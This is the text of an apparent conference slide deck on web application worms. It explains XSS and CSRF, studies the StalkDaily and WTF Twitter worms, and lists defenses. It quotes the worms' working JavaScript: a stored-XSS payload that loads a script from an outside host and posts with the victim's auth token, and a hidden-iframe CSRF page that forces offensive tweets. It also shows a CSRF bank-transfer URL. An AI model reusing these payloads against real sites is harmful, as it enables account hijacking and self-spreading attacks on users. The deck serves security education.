Web Application Worms
By: Mostafa Siraj
@mostafasiraj
Agenda
• Computer Worms
• Why Hackers Develop Web Application Worms
• Web Application Worms
• Introduction to XSS
• StalkDaily Worm on Twitter - XSS Worm
• Introduction to CSRF
• WTF Worm on Twitter – CSRF Worm
• Potential Business Impact
• XSS & CSRF Defenses for
    • Users
    • Web Developers
    • Security Professionals
• Questions
DISCLAIMER
 – Hacking websites is ILLEGAL
 – This presentation is meant for educational purposes ONLY
 – Only use this stuff on YOUR website and YOUR account
Computer Worm

A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it.
(1) According to Wikipedia
Why Hackers Develop Web Application Worms

 • Easier to develop
 • Cross platform (Windows, Linux, OSX and Android) since execution occurs in the web browser
 • Don’t rely on browser, application or OS vulnerabilities
 • Can propagate faster and cleaner than even the most notorious worms
 • 1.01 billion active users on FB (2) according to yahoo finance
 • 170 million active users on Twitter (3) according to techcrunch
Percentage likelihood that at least one serious vulnerability will appear in a website
[Chart slide] (4) According to whitehat security website statistics report, Summer 2012
Web Application Worms

An XSS worm is a malicious (or sometimes non-malicious) payload, usually written in JavaScript, that propagates among visitors of a website in the attempt to progressively infect other visitors.
(5) According to Wikipedia with modification
[Diagram; label: Internet]

You’ll see how to create a worm using a CSRF vulnerability only, without XSS.
How XSS Starts
[Diagram; labels: Adidas, Website]
Cross Site Scripting (Reflected)
[Diagram; labels: Vulnerable Site, Hacker Site, Cookie]
Example request: example.com?q=<script>…….
Cross Site Scripting (Stored XSS)
[Diagram; labels: Vulnerable Site, Hacker Site, Cookie]
XSS Worms

StalkDaily Worm on Twitter
StalkDaily Worm

The bio field allowed Javascript:
<script src="hxxp://mikeyylolz.uuuq.com/x.js>" />
StalkDaily Script
(6) source from dcortesi.com

// excerpt: XHConn, authtoken and ajaxConn1 are not shown on this slide
update = urlencode("Hey everyone, join www.StalkDaily.com. It's a site like Twitter but with pictures, videos, and so much more! :)");

xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');

var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+update+"&tab=home&update=update");

ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update")
StalkDaily Infected Users
What About CSRF Worms
CSRF Example
User has to be logged in.
https://www.MyBank.com/Transfer?from=user&to=hacker&amount=9999
[Diagram; labels: MyBank.com, "Click Here to Win"]
CSRF Worms

WTF Worm on Twitter
WTF Worm

Updating status on Twitter wasn’t protected from CSRF.
By visiting the hacker site, your Twitter account will automatically write two tweets.
WTF Worm Script
(7) script source http://christianheilmann.com

<html> <head></head> <body> <script>
var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;
el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);
</script> </body> </html>
Discussion about WTF worm on Twitter
XSS and CSRF on Facebook
Searches were done on Google
Potential Business Impact of Web Application Worms
• The snowball effect (Samy versus Code Red)
• Web browser botnets (DDoS)
• Think about a worm targeting eBay or Amazon (purchases, reviews, etc.)
• Stealing users’ credentials (MySpace worm in 2006) (10) According to computerworld.com
• What could happen if AdSense or Facebook Connect was compromised with a web application worm
• “High Roller” malware targeting cloud based banking (estimated losses 75M-2.5B) (11) According to redmondmag.com
XSS & CSRF Defenses

Defenses for Users
• Exercise caution when clicking on links sent by email, instant message or through social networks
• Use ScriptNo on Chrome and NoScript on Firefox (use IE at your own risk)
• Avoid questionable websites and cracked software
• Stay informed about security incidents
Defenses for Web Developers
XSS
    – Input validation (accept only known good)
    – Output encoding (ESAPI)
    – Set the session cookie to be “HTTPOnly”
    – Specify the output encoding (UTF-8, ASCII, etc.)
    – Do not use "blacklist" validation
    – Don’t encode/decode more than once
    – (8) XSS Prevention Cheat Sheet on OWASP
CSRF
    – Use CSRFGuard from OWASP
    – Do not use the GET method for any request that triggers a state change.
    – Identify especially dangerous operations and send a separate confirmation request to ensure that the user intended to perform that operation.
    – Ensure that there are no XSS vulnerabilities in your application
    – (9) CSRF Prevention Cheat Sheet on OWASP
Security Professionals

 • Remember “The natural way of writing code is insecure”
 • Developers must take application security training
 • Secure the whole SDLC
 • Assessments and penetration tests
 • White box and black box testing
 • Start considering WAF
Questions
References
(1) Computer Worm on Wikipedia, http://en.wikipedia.org/wiki/Computer_worm
(2) Active Users on Facebook, http://finance.yahoo.com/news/number-active-users-facebook-over-years-214600186--finance.html
(3) Active Users on Twitter, http://techcrunch.com/2012/07/31/twitter-may-have-500m-users-but-only-170m-are-active-75-on-twitters-own-clients/
(4) WhiteHat Security website statistics report, https://www.whitehatsec.com/assets/WPstats_summer12_12th.pdf
(5) XSS Worms on Wikipedia, http://en.wikipedia.org/wiki/XSS_worm
(6) StalkDaily script, http://www.dcortesi.com/blog/2009/04/11/twitter-stalkdaily-worm-postmortem/
(7) WTF script, http://christianheilmann.com
(8) XSS Prevention Cheat Sheet, https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
(9) CSRF Prevention Cheat Sheet, https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
(10) MySpace worm, http://www.computerworld.com/s/article/9005607/MySpace_worm_uses_QuickTime_for_exploit
(11) High Roller malware, http://redmondmag.com/articles/2012/06/20/malware-targeting-banking.aspx
